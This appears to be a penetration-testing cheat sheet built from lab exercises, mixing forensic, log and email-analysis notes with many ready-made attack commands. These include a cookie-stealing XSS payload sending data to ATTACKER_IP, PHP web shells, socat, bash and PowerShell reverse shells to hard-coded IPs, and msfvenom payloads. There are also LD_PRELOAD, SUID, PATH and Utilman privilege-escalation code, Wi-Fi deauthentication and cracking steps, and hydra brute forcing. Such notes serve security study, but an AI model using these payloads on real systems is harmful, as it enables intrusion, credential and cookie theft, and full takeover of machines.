-
Bruteforce
- hashcat
- john
-
cd ~ git clone https://github.com/openwall/john sudo apt install libssl-dev cd john/src ./configure && make echo 'export PATH="PATH:PATH:HOME/john/run"' >> ~/.bashrc echo "alias john='~/john/run/john'" >> ~/.bashrc source ~/.bashrc
- ssh2john.py
unshadow passwd.txt shadow.txt > to-crack.txt
john --wordlist=rockyou.txt to-crack.txt
-
- hydra
hydra -l username -P wordlist.txt server service
hydra -l username -P wordlist.txt service://[MACHINE_IP]:service_port
- POST Web Form
sudo hydra `<username>` `<wordlist>` MACHINE_IP http-post-form "`<path>`:<login_credentials>:<invalid_response>"
- SSH
hydra -l `<username>` -P `<full path to pass>` MACHINE_IP -t 4 ssh
-
Encryption/Decryption
- gpg (GNU Privacy Guard)
- Encrypt:
gpg --symmetric --cipher-algo CIPHER message.txt
- Decrypt:
gpg --output original_message.txt --decrypt message.gpg
- ASCII Armoured Output:
gpg --armor --symmetric --cipher-algo CIPHER message.txt
- Encrypt:
- openssl
- CSR
openssl req -new -nodes -newkey rsa:4096 -keyout key.pem -out cert.csr
- CSR
- gpg (GNU Privacy Guard)
-
Python Tools
-
sudo apt-get install freerdp2-x11
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:10.10.31.212 /u:Administrator /p:'TryH4ckM3!'
- https://nostarch.com/catalog/security
- hashes.com
- crackstation.net
- cyberchef
- sms-pdu-to-text
- https://www.alpertron.com.ar/JAVAPROG.HTM
- microcorruption.com
- https://base64.guru/
- https://www.arin.net/
- IP Info
- whois lookup
- Expand URL
- URL Scan
- Talos Reputation Center
- Track Cyptocurrency Transaction from Wallet Address
- Steganography
- Zero-Width Space Steganography
- jsteg - JPEG Steganography
- Steganography PNG
- steghide
- zsteg
- binwalk
- exiftool
- cyberchef
- Payloads
python3 -c 'import sys; sys.stdout.buffer.write(b"A"*16 + b"\x69\xfe\xca\x00" + b"\x69\x15\x00\x00")' | nc ip port
- Resources
- Tools
- GDB (GNU Debugger)
gdb executable_file
disassemble main
set disassembly-flavor intel
- Add breakpoint
break *main
break *0x0000000000400607
- Run the program
run
run arguments
- Run until the next breakpoint
continue
info registers
set $register_name=value
- Step instruction
si
- Next instruction
ni
- List of info subcommands
i
help
- radare2
radare2 executable_file
- Analyze all
aaa
- Stick to the main function
s sym.main
- Print the disassembly
pdf
- Add breakpoint
db address
(db 0x00400649
) - Reopen in debugger mode (with args)
ood arg1
- Continue execution
dc
- Show registers
dr
- Set register value
dr register_name=address
- Enter visual mode
vv
- Code flow graph
VV
- Press
p
to display the addresses - Press
q
two times to exit the view afvn
for any type of argument or variable- Rename a variable
afvn new_name old_name
V!
to swtich to a fancier mode- In any visual mode, press
:
to type commands
- https://www.abuseipdb.com/
- Network
- Pyramid of Pain
Demonstrates that some indicators of a compromise are more troubling to adversaries than others.
- TTP
- Tools
- Network Artifacts
- Host Artifacts
- Domain Names
- IP Address
- Hash Values
- Models
- Blogs
- Hash Lookups
- Fast Flux Compromised hosts acting as proxies. Attacker has control over DNS server. IP address for the same domain keep changing (using IP addressses of the compromised hosts).
- Malware Sandboxes
- Punnycode
- Log Analysis
- Log Configurations
- Security
- Operational
- Legal
- Debug
- Logging Principles
- Collection
- Format
- Archiving and Accessibility
- Monitoring and Alerting
- Security
- Continuous Change
- Logging Challenges
- Data Volume and Noise
- System Performance and Collection
- Process and Archive
- Security
- Analysis
- Misc
- Types of Logs
- Application Logs
- Audit Logs
- Security Logs
- Server Logs
- System Logs
- Network Logs
- Database Logs
- Web Server Logs
- Common Log File Locations
- Web Servers
- Nginx
- Access Logs:
/var/log/nginx/access.log
- Error Logs:
/var/log/nginx/error.log
- Access Logs:
- Apache
- Access Logs:
/var/log/apache2/access.log
- Error Logs:
/var/log/apache2/error.log
- Access Logs:
- Nginx
- Databases
- MySQL
- Error Logs:
/var/log/mysql/error.log
- Error Logs:
- PostgreSQL
- Error and Activitiy Logs:
/var/log/postgresql/postgresql-{version}-main.log
- Error and Activitiy Logs:
- MySQL
- Web Applications
- PHP
- Error Logs:
/var/log/php/error.log
- Error Logs:
- PHP
- Operating Systems
- Linux
- General System Logs:
/var/log/syslog
- Authentication Logs:
/var/log/auth.log
- General System Logs:
- Linux
- Firewalls and IDS/IPS
- iptables:
- Firewall Logs:
/var/log/iptables.log
- Firewall Logs:
- Snort:
- Snort Logs:
/var/log/snort/
- Snort Logs:
- iptables:
- Web Servers
- Tools
- Log Configurations
- DFIR
- Basics
- Artifacts Pieces of evidence that point to an activity performed on a system
- Evidence Preservation Maintain the integrity of the evidence we are collecting.
- Chain of Custody When the evidence is collected, it must be made sure that it is kept in secure custody.
- Order of Volatility Digital evidence is often volatile.
- Timeline Creation A timeline of events needs to be created for efficient and accurate analysis.
- Tools
- Incident Response Process
- Preparation
- Identification
- Containment
- Eradication
- Recovery
- Lessons Learned
- Basics
- Windows Forensics
- Registry Editor
regedit.exe
- Windows Registry
- Registry Keys
- Registry Values
- Registry Hive A group of keys, subkeys, and values stored in a single file on the disk.
- Windows Registry Root Keys
HKEY_CURRENT_USER
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
- Registry Hives Offline
C:\Windows\System32\Config
- DEFAULT (mounted on
HKEY_USERS\DEFAULT
) - SAM (mounted on
HKEY_LOCAL_MACHINE\SAM
) - SECURITY (mounted on
HKEY_LOCAL_MACHINE\Security
) - SOFTWARE (mounted on
HKEY_LOCAL_MACHINE\Software
) - SYSTEM (mounted on
HKEY_LOCAL_MACHINE\System
)
- DEFAULT (mounted on
C:\Users\<username>\
NTUSER.DAT
(mounted onHKEY_CURRENT_USER
when a user logs in) Location:C:\Users\<username>\
USRCLASS.DAT
(mounted onHKEY_CURRENT_USER\Software\CLASSES
) Location:C:\Users\<username>\AppData\Local\Microsoft\Windows
- Amcache Hive
Saves information on programs that were recently run on the system.
Location:
C:\Windows\AppCompat\Programs\Amcache.hve
- Registry Transaction
- Logs Windows often uses transaction logs when writing data to registry hives.
- Transaction log for each hive is stored as a
registry_hive_name.LOG
file in the same directory as the hive itself.
- Registry Backups
Hives are copied to
C:\Windows\System32\Config\RegBack
every 10 days.
- Registry Editor
- Linux Forensics
- Email Analysis
- Internet Message Format (IMF)
Show Original
from more options in gmail.- Email Headers
X-Originating-IP
Reply-To
(orReturn-Path
)Authentication-Results
(Smtp.mailfrom/header.from)Content-Type
Content-Disposition
Content-Transfer-Encoding
Content-Id
X-Attachment-Id
- Email Header Analysis
- https://www.arin.net/ To which ISP (Internet Service Provider) or webhost the IP address belongs.
- IP Info
- whois lookup
- Hyperlinks or IP addresses should be "defanged".
For example, from
http://www.suspiciousdomain.com
tohxxp[://]www[.]suspiciousdomain[.]com
- Expand URL
- URL Scan
- Talos Reputation Center
- URL Extractor
- Tracking Pixel An HTML code snippet which is loaded when a user visits a website or opens an email. For example, a small pixel size image getting loaded when the email is opened. Allows the attacker to track the success of the phishing attack.
- Typosquatting
- Get hash value of the attachment
- VirusTotal
- PhishTool
- Email Security
- SPF (Sender Policy Framework) An SPF record is a DNS TXT record containing a list of the IP addresses that are allowed to send email on behalf of your domain.
- DKIM (DomainKeys Identified Mail)) A DKIM record exists in the DNS, but it is a bit more complicated than SPF. DKIM’s advantage is that it can survive forwarding, which makes it superior to SPF and a foundation for securing your email.
- DMARC An open source standard, uses a concept called alignment to tie the result of two other open source standards, SPF & DKIM.
- Phishing IR Playbook
- S/MIME (Secure Multipurpose Internet Mail Extensions)
- Digital Signatures
- Encryption
- Timestomping
- APT (Advanced Persistent Threat)
- TTP (Tactics, Techniques, and Procedures)
- Nessus (Vulnerability Scanner)
sudo /bin/systemctl start nessusd.service
- Visit
https://localhost:8834/
- MITRE
- Attack Navigator
- CAR (Cyber Analytics Repository)
- Engage
- Defend
- Engenuity
- Yara
- Zero Logon Vulnerability
- OpenVAS (Open Vulnerability Assesment Scanning)
sudo docker run -d -p 443:443 --name openvas mikesplain/openvas
- MISP (Malware Information Sharing Platform)
- Support
- IoC Database
- Automatic Correlation
- Data Sharing
- Import & Export Features
- Event Graph
- API Support
- N/A
- Support
- Cyber Threat Intelligence (CTI)
- Lifecycle
- Direction
- Collection
- Processing
- Analysis
- Dissemination
- Feedback
- Frameworks
- MITRE ATT&CK
- TAXII
- STIX
- Cyber Kill Chain
- The Diamond Model
- Lifecycle
- abuse.ch (A community driven threat intelligence on cyber threats)
- Talos Intelligence
- OpenCTI
- Memory Forensics
- Volatility
volatility -f Win7-Jigsaw.raw imageinfo
volatility -f Win7-Jigsaw.raw --profile=Win7SP1x64 pslist
volatility -f Win7-Jigsaw.raw --profile=Win7SP1x64 dlllist -p 3704
- Volatility
- OWASP
- Postman
- Burp Suite
- OWASP ZAP
- https://github.com/assetnote/kiterunner
- https://github.com/xmendez/wfuzz
- https://github.com/owasp-amass/amass
- ffuf
- dirb
- gobuster
- Directory Enumeration
gobuster -u MACHINE_IP -w /snap/seclists/current/Discovery/Web-Content/directory-list-1.0.txt
+x php,txt,html
will add these extensions to each word while enumerating.-t 250
- Directory Enumeration
- nikto
- nessus
- Inspect Webhook and HTTP Requests
- Beef
- XSS
-
Blind XSS
-
XSS Polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
-
Cookie Stealing XSS
</textarea><script>fetch('http://ATTACKER_IP:PORT?cookie=' + btoa(document.cookie) );</script>
-
<iframe src="javascript:alert(`xss`)">
-
- Command Injection
- SQLi
- In-Band
- Blind
- Authentication Bypass
- Boolean-based
- Time-based
- Out-of-Band
- Subresource Integrity (SRI)
- Generate Hash: https://www.srihash.org/
<script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
- bypass-403
- Poison Null Byte "%00"
http://10.10.91.44/ftp/package.json.bak%2500.md
- By placing a NULL character in the string at a certain byte, the string will tell the server to terminate at that point, nulling the rest of the string.
- Broken Access Control
- Horizontal Privilege Escalation User performing an action or access data of another user with the same level of permissions.
- Vertical Privilege Escalation User performing an action or access data of another user with a higher level of permissions.
- Upload Vulnerabilities
- Overwriting Existing Files
- Remote Code Execution (RCE)
- It's worth noting that in a routed application (i.e. an application where the routes are defined programmatically rather than being mapped to the file-system), this method of attack becomes a lot more complicated and a lot less likely to occur. Most modern web frameworks are routed programmatically.
- Webshells
gobuster dir -u SERVER_URL -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 250
-
<?php echo system($_GET["cmd"]); ?>
- Reverse/Bind Shells
- Bypassing Client-Side Filtering
- Burp Suite
- Bypassing Server-Side Filtering
- File Extensions
- Magic Numbers
while read line; do echo $line; done < flag.txt
grep . flag.txt
(period for anything)
-
nc -lvnp port
-
rlwrap nc -lvnp port
CTRL + Z
stty raw -echo; fg
-
- socat static compiled binary
- Change Terminal Size
stty -a
stty rows number
stty cols number
socat TCP-L:PORT -
socat TCP:TARGET_IP:TARGET_PORT -
- Fully Stable Linux TTY Reverse Shell
- Listener
socat TCP-L:PORT FILE:TTY,raw,echo=0
- Activation Command
socat TCP:ATTACKER_IP:ATTACKER_PORT EXEC:"bash -li",pty,stderr,sigint,setsid,sane
- Listener
- Reverse Shells
- Windows
socat TCP:LOCAL_IP:LOCAL_PORT EXEC:powershell.exe,pipes
- Linux
socat TCP:LOCAL_IP:LOCAL_PORT EXEC:"bash -li"
- Windows
- Blind Shells
- Windows
socat TCP-L:PORT EXEC:powershell.exe,pipes
- Linux
socat TCP-L:PORT EXEC:"bash -li"
- Windows
- Encrypted Shells
Replace
TCP
withOPENSSL
- Generate Certificate
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
- Listener
socat OPENSSL-LISTEN:PORT,cert=shell.pem,verify=0 -
- Activation Command
socat OPENSSL:LOCAL_IP:LOCAL_PORT,verify=0 EXEC:/bin/bash
- Generate Certificate
-
- Common
nmap -A -sC -sV -p- -T4 --min-rate=9326 -vv MACHINE_IP
nmap -Pn -sV MACHINE_IP
nmap MACHINE_IP -p port1,port2,port3 -script vuln
- Options
- no DNS lookup
-n
- reverse-DNS lookup
-R
- host discovery only (without port-scanning)
-sn
- all ports
-p-
- scan ports 1 to 1023
-p1-1023
- 100 most common ports
-F
- scan ports in consecutive order
-r
- T0 being the slowest and T5 the fastest
-T<0-5>
- rate <= 50 packets/sec
--max-rate 50
- rate >= 15 packets/sec
--min-rate 15
- at least 100 probes in parallel
--min-parallelism 100
- debugging
-d
- verbose
-v
- explains reasoning
--reason
- fragment IP data
-f
- specify source port
--source-port PORT_NUM
- append random data to reach given length
--data-length NUM
- service/version info
-sV
- os detection
-O
- tracerpite
--traceroute
- no DNS lookup
- ARP Scan
sudo nmap -PR -sn MACHINE_IP/24
- ICMP
- ICMP Echo Scan
sudo nmap -PE -sn MACHINE_IP/24
- ICMP Timestamp Scan
sudo nmap -PP -sn MACHINE_IP/24
- ICMP Address Mask Scan
sudo nmap -PM -sn MACHINE_IP/24
- ICMP Echo Scan
- TCP
- TCP SYN Ping Scan
sudo nmap -PS22,80,443 -sn MACHINE_IP/30
- TCP ACK Ping Scan
sudo nmap -PA22,80,443 -sn MACHINE_IP/30
- TCP Connect Scan
nmap -sT 10.10.117.61
- TCP Null Scan
sudo nmap -sN MACHINE_IP
- TCP FIN Scan
sudo nmap -sF MACHINE_IP
- TCP Xmas Scan
sudo nmap -sX MACHINE_IP
- TCP Maimon Scan
sudo nmap -sM MACHINE_IP
- Custom TCP Scan
sudo nmap --scanflags URGACKPSHRSTSYNFIN MACHINE_IP
- TCP SYN Ping Scan
- UDP
- UDP Ping Scan
sudo nmap -PU53,161,162 -sn MACHINE_IP/30
- UDP Ping Scan
- Spoofed Source IP
sudo nmap -S SPOOFED_IP MACHINE_IP
- Spoofed MAC Address
--spoof-mac SPOOFED_MAC
- Decoy Scan
nmap -D DECOY_IP,ME MACHINE_IP
- Idle (Zombie) Scan
sudo nmap -sI ZOMBIE_IP MACHINE_IP
- Common
-
enum4linux -a MACHINE_IP
-
Traffic Analysis
- wireshark
- tshark
- NetworkMiner
- RSA Netwitness
- apackets (Online)
-
MITM
-
Wifi
- aircrack-ng
- Check for Wifi adapter interface
iwconfig
- Run Wifi adapter on
Monitor
modesudo airmon-ng start interface_name
- Check and kill any interfering process
sudo airmon-ng check kill
- Capture traffic from nearby Wifi
sudo airodump-ng interface_name
- Capture traffic from target Wifi
sudo airodump-ng --bssid target_bssid -c target_channel --write target_traffic interface_name
- Deauthentication attack
sudo aireplay-ng --deauth packet_count -a target_bssid interface_name
- In case of similar issue (
wlan0mon is on channel 2, but the AP uses channel 5
)sudo airmon-ng start interface_name target_channel
- In case of similar issue (
- Cracking the password
sudo aircrack-ng -b target_bssid captured_traffic.cap -w wordlist
- Convert to hashcat file (
-j
or-J
)sudo aircrack-ng -j output.hccapx -b target_bssid file.cap
- Check for Wifi adapter interface
- wifite
- aircrack-ng
-
- Database
systemctl start postgresql
msfdb init
- db_status
- workspace
- help
- db_nmap
- hosts
- services
- SMTP
- smtp_enum
- smtp_version
- MySQL
- mysql_sql
- mysql_schemadump
- mysql_hashdump
- multi/handler
use multi/handler
exploit -j
- msfvenom
msfvenom -p PAYLOAD OPTIONS
- Payload Name
OS/arch/payload
linux/x86/shell_reverse_tcp
- Windows x64 Reverse Shell in an exe format
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=listen-IP LPORT=listen-port
- Payloads
- Staged Payloads (
/
) (Better for evading firewalls) - Stageless Payloads (
_
) (Can be caught usingnc
listener instead ofmulti/handler
)
- Staged Payloads (
msfvenom --list payloads
msfvenom --list payloads | grep "some_payload"
- portscan
- SMB
- smb_enumshares
- smb_version
- smb_login
- enum_shares
- meterpreter
- hashdump
- kiwi
- Database
-
-
Windows Powershell Reverse Shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.17.69.74',12345);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
-
-
Web Shells
-
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
-
- PEASS-ng
- GTFOBins
- DirtyCow
- Linux
- Commands
hostname
uname -a
/proc/version
/etc/issue
- ps
ps
ps -A
ps axjf
ps aux
env
sudo -l
id
/etc/passwd
cat /etc/passwd | cut -d ":" -f 1
cat /etc/passwd | grep home
history
ifconfig
ip route
netstat
netstat -a
find
find /home -name flag1.txt
- LinPeas
- LinEnum
- Kernel Exploit
- Sudo
sudo -l
- https://gtfobins.github.io/
- LD_PRELOAD
Generate a shared library which will be loaded and executed before the program is run.
- Check for LD_PRELOAD (with the env_keep option)
- Write a simple C code compiled as a share object (.so extension) file
#include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); }
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
- Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
- SUID
- List the files that have SUID or SGID set
find / -type f -perm -04000 -ls 2>/dev/null
nano
base64
- List the files that have SUID or SGID set
- Capabilities
getcap
- List enables capabilities
getcap -r / 2>/dev/null
- Cron Jobs
/etc/crontab
- Reverse Shell
#!/bin/bash
bash -i &> /dev/tcp/10.10.217.232/1234 0>&1
chmod +x target_file
- PATH
-
echo $PATH
-
Write a script (
gateway
) that will search for a command (attack
) from the `PATH#!/usr/bin/python3 import os import sys try: os.system("/bin/bash") except: sys.exit()
Make it executable.
-
Set SUID bit
chmod u+s gateway
-
If we have write access to any paths mentioned in
PATH
, we create a binary (attack
) named same as the command- attack
echo "/bin/bash" >> attack
chmod 777 attack
- Find writable folders
find / -writable 2>/dev/null
find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
- Add folder to
PATH
export PATH=/folder_name:$PATH
- attack
-
Now, if we run the script (
gateway
), the script will run the binary (attack
) with root priviledge.
-
- NFS
- On target machine
cat /etc/exports
Find share withno_root_squash
- Enumerate mountable shares
showmount -e target_ip
- Mount one of the
no_root_squash
shares to the attacking machine. - Build a executable (
attack.py
)#!/usr/bin/python3 import os import sys try: os.system("/bin/bash") except: sys.exit()
- Set SUID bit
chmod +s attack.py
- Copy it to the mounted directory
- Execute it from target machine (shell)
- On target machine
- Commands
- Windows
- Print
type flag.txt
- Create a new user
net user username password /add
- Add the user to administrator group
net localgroup administrators username /add
schtasks
schtasks /query /tn task_name /fo list /v
schtasks /run /tn task_name
icacls
To check file permission of an executableicacls file_path
icacls service_name /grant Everyone:F
sc qc
BINARY_PATH_NAME
Associated ExecutableSERVICE_START_NAME
Account used to run the executablesc server_name qc service_name
sc qc service_name
sc start service_name
sc stop service_name
- Discretionary Access Control List (DACL)
- Process Hacker
- All of the services configurations are stored on the registry under
HKLM\SYSTEM\CurrentControlSet\Services\
- Permissions
F
(Full Access)M
(Modify)RX
(Read-Execute)I
(Inherit)
- Insecure Permissions on Service Executables
M
access permission to the executable
- Unquoted Service Paths
BINARY_PATH_NAME : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
C:\MyPrograms\Disk.exe
C:\MyPrograms\Disk Sorter.exe
C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
- But we have to have permission to the parent directory
- Insecure Service Permissions
-
If the service DACL (not the service's executable DACL) allow us to modify the configuration of a service, we will be able to reconfigure the service.
-
To check for a service DACL from the command line, Accesschk
accesschk64.exe -qlc service_name
SERVICE_ALL_ACCESS
Can reconfigure the service
-
- Windows Privileges
whoami /priv
- Priv2Admin
SeBackup/SeRestore
Allow users to read and write to any file in the system, ignoring any DACL in place.reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive
SeTakeOwnership
Allows a user to take ownership of any object on the system.utilman.exe
takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
copy cmd.exe utilman.exe
- Clicking on ease of access button (
utilman
), now we get acmd
with system privileges.
SeImpersonate/SeAssignPrimaryToken
Allow a process to impersonate other users and act on their behalf.
- Vulnerable Softwares
wmic
wmic product get name,version,vendor
- Case Studies
- Druva inSync 6.6.3
- Print
- OSINT Framework
- hunter.io
- theHarvester
- Social
- sherlock
- [LinkedInt](- https://github.com/vysecurity/LinkedInt -)
- [gophish](- - https://github.com/gophish/gophish -)
- Google Dorking
- Wayback Machine
- Subdomain Enumeration
- Certificate Search
- Sublist3r
- Domain Name or IP Related
- File Related
- recon-ng
- maltego
- https://www.exploit-db.com/
- https://www.exploit-db.com/searchsploit
- https://nvd.nist.gov/vuln/search
- https://www.rapid7.com/db/
- https://cve.mitre.org/
- https://www.cvedetails.com/
- Zero Logon Vulnerability (Secura Whitepaper)
- OpenVAS
sudo docker run -d -p 443:443 --name openvas mikesplain/openvas
-
Static Malware Analysis
-
Antivirus (AV)
- SharpEDRChecker
- Open Source
- AntiscanMe
- Jotti
-
Fuzzy Hashing (Similarity Preserving Hash Functions or SPHF)
-
MISP (Malware Information Sharing Platform)
-
Remote Access Trojan (RAT)
-
Identify the compile/packer of a file
-
Just because a file doesn't have the
.exe
extension, doesn't mean it isn't an actual executable! It can have the.jpg
extension and still be an executable piece of code. Depends onfile signatures
. -
If a file isn't obfuscated/packed, it should have a larger import count and more complex codeflow graph, viewed on disassmbler.
-
vmonkey
ViperMonkey is a parser engine that is capable of analysing visual basic macros without executing (opening the document).
-
Malicious PDFs
-
Can include
- Javascript
- Python
- Executables
- Powershell Shellcode
-
peepdf demo_notsuspicious.pdf
echo 'extract js > javascript-from-demo_notsuspicious.pdf' > extracted_javascript.txt
peepdf -s extracted_javascript.txt demo_notsuspicious.pdf
-
-
readelf -l file_name
-
File Entropy
- A rating that scores (0-8.0) how random the data within a PE file is.
- Encrypted/packed file will have high entropy score.
- Packers change the entry point from the original location to what's called the "Unpacking Stub". Once the program is fully unpacked, the entry point will now relocate back to its normal place to begin executing code.
- Packed files will have very few "Imports". (May only have "GetProcAddress" and "LoadLibrary")
- They may have sections named after certain packers such as UPX.
- USB Rubber Ducky Using Rasberry Pi Pico https://github.com/dbisu/pico-ducky
- FemtoCell
- Stingray